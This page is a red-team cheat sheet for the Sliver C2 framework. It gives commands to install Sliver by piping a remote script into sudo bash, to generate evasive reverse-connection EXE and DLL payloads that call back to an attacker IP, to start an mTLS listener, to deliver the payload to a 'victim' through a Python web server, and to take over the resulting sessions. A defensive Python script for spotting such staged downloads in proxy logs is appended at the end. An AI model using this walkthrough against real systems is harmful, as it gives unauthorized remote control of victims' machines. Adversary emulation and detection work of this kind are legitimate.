
Sliver

Last updated 1 year ago

Sliver is an open source project created and maintained by BishopFox as a multi-platform adversary emulation and red team tool. Sliver facilitates the generation of reverse connection payloads as EXE, DLL, or shellcode.

Installing

It has binaries for Windows, Linux, and macOS, allowing you to deploy Sliver C2 infrastructure on any system.

Pre-reqs

sudo apt install -y mingw-w64 binutils-mingw-w64 g++-mingw-w64

Running

This can be downloaded from the Sliver repo, either with wget or directly.

Install on system

curl https://sliver.sh/install | sudo bash

Run it

sliver

Standalone release

wget https://github.com/BishopFox/sliver/releases/download/v1.4.14/sliver-server_linux.zip

Unzip the file

unzip sliver-server_linux.zip

Make it executable

chmod +x sliver-server

Run it

sudo ./sliver-server

Usage

Making a payload

To generate a payload you must know your IP address (the external one if the server is hosted externally). This will generate a randomly named executable file that can be delivered to targets in a variety of ways. The -m and -e flags used below select a mutual TLS (mTLS) connection to connect back on and enable evasion, respectively. The IP address entered is the IP address of your Sliver server.

generate -m (attacker ip) -e

The executable file will be in the folder where sliver was run.

Making .dll payload

generate --mtls (attacker ip) --format shared --skip-symbols

Starting The MTLS Listener

The listener must be started before the delivery and execution of the payload on a target system. This listener will display all active connections from target systems to your C2 server.

mtls

Exploit

Get the executable onto the victim. I'll do this via a quick python webserver.

python3 -m http.server 8008

When the server is being accessed and a file is being downloaded

On the victim machine go to the webserver and click on the file you want to download

Once it is executed, we should see the connection from the sliver terminal.

We can also check on active or alive sessions with the sessions command.

Connect to the session

sessions -i (session id)

Run whatever commands you may need/want.
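A detection-side view of the delivery step above, as an added example (not part of the original page or the Sliver project): it scores proxy log records for a Windows executable fetched from a host running `python3 -m http.server`. The log schema, field names, addresses and file names are constructed for illustration.

```python
import ipaddress
import json

# Constructed proxy log records (hypothetical schema, not from a real product).
# body_magic = first two response-body bytes as hex; "4d5a" is the PE "MZ" header.
SAMPLE_LOG = """\
{"client": "10.0.5.23", "host": "203.0.113.7", "port": 8008, "uri": "/RANDOM_NAME.exe", "server": "SimpleHTTP/0.6 Python/3.11.2", "body_magic": "4d5a"}
{"client": "10.0.5.23", "host": "downloads.example.com", "port": 443, "uri": "/setup.exe", "server": "nginx", "body_magic": "4d5a"}
{"client": "10.0.5.40", "host": "203.0.113.7", "port": 8008, "uri": "/", "server": "SimpleHTTP/0.6 Python/3.11.2", "body_magic": "3c21"}
{"client": "10.0.5.41", "host": "198.51.100.9", "port": 8000, "uri": "/notes.txt", "server": "SimpleHTTP/0.6 Python/3.10.12", "body_magic": "6869"}
"""

def is_ip_literal(host):
    """True when the Host is a bare IP address rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def score(rec):
    """Return (score, reasons) for one record; higher means more suspicious."""
    reasons = []
    # python3 -m http.server answers with a "SimpleHTTP/<ver> Python/<ver>" banner.
    if rec.get("server", "").startswith("SimpleHTTP/"):
        reasons.append("python http.server banner")
    if is_ip_literal(rec.get("host", "")):
        reasons.append("bare IP host")
    if rec.get("port") not in (80, 443):
        reasons.append("non-standard port")
    is_pe = rec.get("body_magic", "").lower().startswith("4d5a")
    if is_pe or rec.get("uri", "").lower().endswith((".exe", ".dll")):
        reasons.append("PE download")
    return len(reasons), reasons

def find_staged_payloads(log_text, threshold=3):
    """Flag PE downloads that match at least `threshold` indicators in total."""
    hits = []
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip blank or malformed lines rather than abort the hunt
        n, reasons = score(rec)
        if "PE download" in reasons and n >= threshold:
            hits.append((rec.get("client"), rec.get("host"), rec.get("uri"), reasons))
    return hits

if __name__ == "__main__":
    for hit in find_staged_payloads(SAMPLE_LOG):
        print(hit)
```

The threshold keeps ordinary executable downloads from named hosts on 443 out of the results; tune it against your own proxy baseline.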
